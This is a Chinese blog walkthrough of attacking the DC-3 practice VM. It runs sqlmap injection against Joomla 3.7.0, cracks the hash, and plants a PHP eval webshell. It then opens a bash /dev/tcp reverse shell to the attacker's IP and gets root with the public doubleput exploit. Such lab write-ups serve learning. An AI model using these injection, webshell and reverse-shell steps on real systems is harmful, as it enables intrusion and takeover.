DC-3主机渗透

已于 2023-05-18 18:08:07 修改
阅读量389 收藏
点赞数 3
分类专栏: DC系列靶机 文章标签: 网络安全 sql 数据库
于 2023-05-18 18:06:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65920814/article/details/130749500
版权
该文详细阐述了对DC-3主机进行渗透测试的过程,包括使用KaliLinux发现目标IP,通过nmap扫描端口,识别JoomlaCMS并利用joomscan工具,接着进行SQL注入攻击,使用sqlmap获取数据库信息,破解密码,植入并利用一句话木马,通过蚁剑反弹shell,最后查找并利用Ubuntu16.04的提权漏洞获得root权限。
摘要由CSDN通过智能技术生成

提示:仅供学习参考,勿盗用,谢谢

前言

本文章主要讲解DC-3主机渗透全过程

提示:以下是本篇文章正文内容,可供参考

一、配置

DC-3主机渗透

网络适配器打开VMnet8;

在VMware中文件 -- 打开 -- 导入DC-3;

开启kali、DC-3.

kali作为攻击机 ip地址:192.168.159.128

DC-3 ip:192.168.159.133

注:确保靶机和攻击机在同一网段,设置同一网络连接方式:kali、DC-3虚拟机设置-网络适配器使用NAT模式;DC-3虚拟机设置DC/DVD(IDE)-高级-IDE(D)修改为IDE 0:0。如下图:

二、步骤

1.发现目标主机ip:

代码如下:

arp-scan -l

 

2.收集目标主机端口信息:

代码如下:

nmap -sV -p- 192.168.159.133

 3.访问目标主机80端口

4.收集目标主机的web信息

whatweb http://192.168.159.133

 

发现Joomla框架(CMS)

5.利用joomscan进行Joomla框架扫描

joomscan是Joomla框架的专属扫描工具

joomscan --url http://192.168.159.133

发现 Joomla 版本是3.7.0 
发现后台管理页面 http://192.168.159.133/administrator/ 

(后台管理页面也可以用dirb http://192.168.159扫描)

6.搜索寻找Joomla版本是否有漏洞

searchsploit joomla 3.7.0

7.选择sql注入攻击脚本

8.查看SQL注入漏洞对应的文件42033.txt

cat php/webapps/42033.txt 不成功

find / -name 42033.txt

 

cat usr/share/exploitdb/exploits/php/webapps/42033.txt

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

9.根据42033.txt提示进行sqlmap注入或手工注入

 查询数据库:

sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 查询表名:

sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

 查询列:

sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" --columns -p list[fullordering]

注出数据:

sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" -C username,password --dump -p list[fullordering]

 注出结果:

10.破解密文

 将密文编辑到txt文件,使用john工具破解密文:

 解出口令为snoopy

 11.登录网站后台,写入一句话木马

 找到Templates -- Beez3 -- New File -- 创建PHP文件 -- 写入一句话木马 --save

 

 

 一句话木马代码:

<?php
@eval($_POST[1]);
?>

12.蚁剑连接

 连接成功后,右键打开虚拟终端,反弹shell

在kali打开终端输入命令:nc -lnvp 4444
蚁剑虚拟终端输入命令:bash -c 'sh -i &>/dev/tcp/192.168.159.128/4444 0>&1'

13.收集主机内核版本信息和操作系统版本信息

uname -a
cat /etc/issue

14.搜索提权漏洞

searchsploit Ubuntu 16.04

 在这里选择39772.txt文件

15.找到39772.txt漏洞脚本

find / -name 39772.txt
cat /usr/share/exploitdb/exploits/linux/local/39772.txt

16.下载39772.zip漏洞执行压缩包

此链接国内无法访问,懂得都懂

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

17.上传漏洞提权包至靶机

考虑蚁剑上传39772.zip:

18.解压39772.zip

如图所示命令操作:

19.解压exploit.tar

20.执行脚本文件

./compile.sh
./doubleput

 21.成功获得root权限,进入root目录查看

cd /root
ls
cat the-flag.txt

 成功查看flag文件,渗透完成!

总结

以上就是今天要讲的内容,本文详细介绍了DC-3渗透主机的使用。

阿雯183
关注
专栏目录
DC-5主机渗透
weixin_65920814的博客
05-25 244
本文详细介绍DC-5主机渗透测试的全部内容
DC-6主机渗透
weixin_65920814的博客
05-30 185
以上就是详细介绍的DC-6主机渗透测试的全部内容。
主机 渗透
lin__ying的博客
03-14 454
1:kali靶机:Windows Server 2003。
DC-3靶机进行渗透测试
zll___的博客
03-13 915
DC-3靶机进行渗透测试
dc-9主机渗透
w1157673482的博客
02-28 4291
DC-9主机渗透测试
DC-3靶机详细渗透过程
MRS_jianai的博客
11-30 864
dc-3靶机详细渗透教程
DC靶机渗透系列(DC1-DC3)
居上
07-01 797
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
DC-1靶场渗透实验
Alashan12的博客
05-05 2008
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1460
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
主机渗透——TOMCAT_UPLOAD
B_roin的博客
02-14 2264
1. 使用nmap进行端口扫描,发现8080端口开放 2. 结合目标网站版本,进行信息收集 3. 发现存在命令执行漏洞 利用burp suite上传 jsp 木马 4. 在web页面进行访问查看 http://ip地址/tt.jsp?pwd=023&i= 命令 5. 结合冰蝎,获取webshell 注意:冰蝎需要使用自己的shell 利用burpsuite PUT方式上传后,连接冰蝎 ...
Linux 主机超全渗透测试命令汇总
02-12
Linux 主机超全渗透测试命令汇总Linux 主机超全渗透测试命令汇总Linux 主机超全渗透测试命令汇总
web渗透--主机发现
朝阳似锦 晖映山河
08-23 335
一、OSI分层 1、OSI(Open System Interconnect),开放式系统互联,他将网络分为七层,每一层发送信息都是单进行。具体模型如下图(下图为网络中寻找,如有侵权,请告知) 二、二层主机发现 1、二层主机发现主要是利用的OSI中链路层进行主机发现。链路层发送对应的帧,主要利用的是arp协议(地址解析协议)。二层主机优点(局域网中通通信使用ARP协议,利用MAC地址作为对应的识别地址): 速度快、可靠性高。但是无法扫描经过路由的主机。 ...
DAY27:主机渗透测试
qq_49433473的博客
08-10 2779
主机渗透测试、主机渗透常用端口、服务默认端口及爆破使用、主机渗透漏洞实例利用 向日葵rce示例,redis弱口令爆破及getshell
内网安全---边界主机渗透
gental_z的博客
01-22 1244
一、简单环境搭建 一台VPS,一台边界服务器OWASP,一台内部服务器Ubuntu Server 网络拓扑如图所示: 关于环境的部署,在OWSAP服务器中设置两张网卡,一张设置外部IP,另外一张设置内部IP。 # 具体配置在/etc/network/interface # 这里设置静态IP auto eth0 iface eth0 inet static address 192.168.101.100 netmask 255.255.255.0 gateway 192.168.101.2 auto et
内网安全---一层主机渗透
gental_z的博客
01-30 843
内网学习小结 一、环境搭建 实验拓扑结构: 在一层内网服务器ubuntu上搭建redis服务器,接下来的实验通过redis未授权漏洞来获取目标主机的权限。 在OWASP服务器上做NAT转换,使Ubuntu Server可以连接外网: # 配置ipables做nat iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o eth0 -j SNAT --to 192.168.101.100 # 打开Linux内核转发功能 echo "1" > /pr
渗透测试---主机扫描
孤的博客
09-25 1214
ping PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序。Ping发送一个ICMP(Internet Control Messages Protocol)即因特网信报控制协议;回声请求消息给目的地并报告是否收到所希望的ICMPecho (ICMP回声应答)。它是用来检查网络是否通畅或者网络连接速度的命令。 Ping非常容易被屏蔽。 arp-sc...
渗透-主机发现】从0到1,结合工具,入门渗透中的主机发现技术
极客-多重人格递归
05-11 719
要实现一次成功的渗透操作,先要有一些预动作,例如:主机发现、信息收集、漏洞扫描等。主机发现的根本目的就是找到你要进行渗透操作的目标,其中,可以有很多思想方法可以借鉴,有很多工具可以利用。
新手如何入门黑客技术,黑客技术入门该学什么?
Karka_的博客
10-11 150
你是否曾经也对黑客技术感兴趣呢?感觉成为黑客是一件很酷的事,那么作为新手如何入门黑客技术,黑客技术入门该学什么呢?其实不管你想在哪个新的领域里有所收获,你需要考虑以下几个问题首先你要想明白为什么学这个,不管是爱好也好,想要把他作为职业也好,只有清楚了自己的目的后才可以持之以恒的去学习,因为计算机领域要学的知识是非常多的,没有长久的坚持是没办法学会的。
内网渗透主机发现的技巧
hl1293348082的专栏
04-08 442
在内网渗透中,为了扩大战果,往往需要寻找更多主机并且对这些主机进行安全检测或帐号密码测试,所以主机发现这个步骤必不可少。我们如何在不实用扫描器的情况下发现更多主机呢? 确定IP段 通常内网地址分三段:10.0.0.0/8、172.16.0.0/12以及192.168.0.0/16。在没有做任何操作之前,我们可以大概知道内网的IP地址段,不过也有些公司,在内网又会有公网IP的情况,也就是说在内网中可以访问到的IP段有很多。 下面就主要介绍一下收集IP段的方式。 查看本机的IP地址 Window.
nmap扫描DC-5
最新发布
05-21
nmap是一款常用的网络扫描工具,可以用于发现网络上的主机、端口和服务。在扫描DC-5时,可以通过nmap来探测该目标...3. 根据nmap扫描结果进行后续渗透测试,例如对开放的Web服务进行漏洞扫描、尝试使用弱口令登录等等。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值